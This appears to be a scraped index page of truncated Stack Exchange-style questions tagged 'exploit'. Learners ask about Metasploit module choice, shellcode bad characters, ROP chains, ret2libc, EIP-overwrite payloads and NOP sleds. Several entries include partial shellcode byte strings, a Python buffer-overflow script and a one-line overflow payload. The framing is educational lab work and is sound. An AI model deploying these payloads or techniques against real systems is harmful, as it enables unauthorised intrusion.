Which exploit and which payload to use?

Hi everyone, and sorry for my bad English. I'm learning penetration testing. After reconnaissance and scanning of my target, I have enough information to pass to the next phase. Some info I have is open ports with related running services, names of the services, service versions, operating system of the device, firewalls used, etc. I launched msfconsole. I should find the correct exploit and payload, based on the information collected, to gain access. I've read the Metasploit Unleashed guide on offensive-security. I've learned the Metasploit Funda…

How to import .C & .pl extension exploits into metasploit framework?

How can I import .c (C language) and .pl (Perl) extension exploit modules into the Metasploit framework? Metasploit generally accepts .rb (Ruby) extension modules? Can anyone provide tutorials to import these extension modules? I read about the Immunity Debugger, but I don't understand the way to convert it. Immunity Debugger is used to code exploits. I just want to import the below shellcode into the Metasploit framework. This code is written in C. So is there any way to import the below exploit into the Metasploit framework? http://www.exploit-db....

exploit - Segfault when running hello world shellcode in C program

Sorry if this question sounds dumb, but I am very new to shellcoding and I was trying to get a hello world example to work on a 32-bit Linux machine. As this is shellcoding, I used a few tricks to remove null bytes and shorten the code. Here it is:

    section .data
    section .text
    global _start
    _start:
    ;Instead of xor eax,eax
    ;mov al,0x4
    push byte 0x4
    pop eax
    ;xor ebx,ebx
    push byte 0x1
    pop ebx
    ;xor ecx,ecx
    cdq ; instead of xor edx,edx
    ;mov al, 0x4
    ;mov bl, 0x1
    mov dl, 0x8
    push 0x65726568
    push 0x74206948
    ;mov ecx, esp
    push esp
    pop ecx
    int 0x80
    mov al, 0x1
    xor ebx,ebx
    int 0x80

T…

exploit - shellcode is truncated by \x20

Why is my shellcode truncated after the \x20 opcode when it is copied as a string to the stack in a second vulnerable program?

    --cmd.exe--
    char shell[]="\xc7\x44\x24\x0c\x65\x78\x65\x20"   <- only this line is put on the stack, though there is enough space
    "\xc7\x44\x24\x08\x63\x6d\x64\x2e"
    "\x31\xc0"
    "\x89\x44\x24\x04"
    "\x8d\x44\x24\x08"
    "\x89\x04\x24"
    "\x8d\x05\xad\x23\x86\x7c"
    "\xff\xd0";
    --end shell--

…

exploit - Bad characters in Return Oriented Programming

I am writing a ROP chain for a vulnerable program (stack overflow, with NX and ASLR turned on). I follow the execution of my gadgets by watching the stack pointer in gdb-peda. It works well except when it encounters the gadget mov [eax], edx; ret. This gadget gets executed, but after it there is a push ebx that follows, even though I didn't put any gadget like that in my ROP chain. And in the end my exploit doesn't work. I have tried this instruction with different registers and there is always the push ebx that follows, and I don't know why. Would someone…

exploit - Immunity debugger: access violation when executing

I am writing a simple exploit using jmp esp, but after going to esp at address 00B7FC2C Immunity shows the error: Access violation when executing [00B7FC2C]. Here is my code:

    #!/usr/bin/python2.7
    import sys, os, socket
    fuzz = "\x41" * 248
    eip = "\x59\x54\xC3\x77"
    nops = "\x90" * 8
    shellcode = "\xdb\xcc\xba\x40\xb6\x7d\xba\xd9\x74\x24\xf4\x58\x29\xc9"
    shellcode += "\xb1\x50\x31\x50\x18\x03\x50\x18\x83\xe8\xbc\x54\x88\x46"
    shellcode += "\x56\x72\x3e\x5f\x5f\x7b\x3e\x60\xff\x0f\xad\xbb\xdb\x84"
    shellcode += "\x6b\xf8\xa8\xe7\x76\x78\xaf\xf8\xf2\x37\xb7\x8d\x5…

exploit - Why return-to-libc shell using system() exits immediately?

I'm experimenting with control-flow hijacking attacks on programs written in C on Linux. I'm trying to perform a simple ret-2-libc attack on a program with the No-eXecutable-stack countermeasure enabled. For this purpose I'm returning to the system() function with the argument /bin/sh. But I have a problem: although my attack works and a shell is spawned successfully, the shell exits immediately after entering the first character! That is, the shell closes after I press any key! This behavior is also observable in this simple C code:

    int main() { system("/bin/…

exploit - How to generate payload with python for buffer overflow?

I'm trying to provoke a buffer overflow in order to execute a function in C code. So far I have already managed to find out the number of bytes needed to take over the EBP register. The only thing next is to substitute the address in EIP with that of the function I wish to execute. I'm trying to generate this payload with Python. For this I use the following:

    python -c 'print "A"*112 + "\x3b\x86\x04\x08"' > attack_payload

This is what I get:

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;�

Notice …

Problems with Metasploit's "Easyrmtomp3" exploit module

I started learning exploit writing some time back and created a few exploits. One of them was for Easy RM to MP3 Converter, and it worked pretty well. However, now I thought about converting my exploits to Metasploit modules, and followed the steps given in a number of articles. However, the only error that I am facing is that the payload is not working. Ultimately, I resorted to looking online for a similar module, and found one which is definitely supposed to work. However, I do not get back a meterpreter ses…

exploit - Different behaviour of read

I'm trying to understand why this program returns different errors when I change the size of the buffer:

    #include <stdio.h>
    #include <unistd.h>
    #include <fcntl.h>
    #include <errno.h>
    #include <string.h>   /* for strerror */
    int main(){
        int file = open("./test",O_RDWR);
        //char buff[204796] = "" ; // -> File Descriptor error (no seg fault)
        //char buff[100000]="";    // -> Seg Fault
        char buff[208896]="";      // -> Bad Address (no seg fault)
        int i = 0;
        while(read(file,buff+i,2048) > 0){
            i += 2048;
        };
        fprintf(stderr, "%s\n", strerror(errno));
    }

test is a file with 500000 A's :) When a Bad Ad…

exploit - Exploiting the delay when a festival ticket is scanned

How a ticket system works

A ticket system - one you see at festivals - works like this: when a user pays for their ticket, a row is added to the database with a column named is_scanned, whose default value is set to false. As soon as a guard at the festival scans the barcode (containing an ID and a unique hash) with their device, a request is sent to the database to check if:

- the user matching the ID and hash has paid, and
- the value of the column is_scanned is still set to false.

If both conditions are satisfied, it sets the value of is_scanned to true, …

exploit - VPS compromised? Configured wrong?

I've been renting a VPS for half a year now (educational purposes) and I've been trying to learn as much as possible about keeping it secure. Recently, it was compromised and I suspect that it was used as someone's proxy for about a week before I realized. I had logs of users 'anonymous' and 'nobody' logging in and out via SSH, and the CPU usage was off the chart - literally. In any case, I reinstalled it and re-applied everything I knew to test whether it would happen again, and within the short 24 hours after the reinstall, I think it did. Here ar…

exploit - How do I prevent tampering with form submission data, and changing the details for any account?

Although this is something that only employees can use, I'd like to prevent the tampering anyway. I don't like insecure code, and this is hideously insecure. Here's an example link:

    <a href="#' + j.id + '" onclick="LoadThis(\'Test.aspx?id=' + obj.id + '\', \'post\', null, null);">Edit User #' + j.id + '.</a>

I sent this to the client side using jQuery:

    $.ajax({
        url: "Test.aspx/RemoveUsernameByID",
        type: "POST",
        data: 1,
        beforeSend: function (before) { /* do stuff */ },
        success: function (success) { /* do stuff */ },
        er…

exploit - Perl doesn't print 0x00

I wanted to experiment with the NOP sled technique. I got the sled and the shellcode into an environment variable and I got its address. So I wanted to execute the vulnerable program and, as an argument, use this address repeated; the problem is that it contains zeros: 0x00007fffffffe550.

    ./program_vuln $(perl -e 'print "\x50\xe5\xff\xff\xff\x7f\x00\x00"')

Perl does not print the zeroes and the addressing on the stack became so messed up…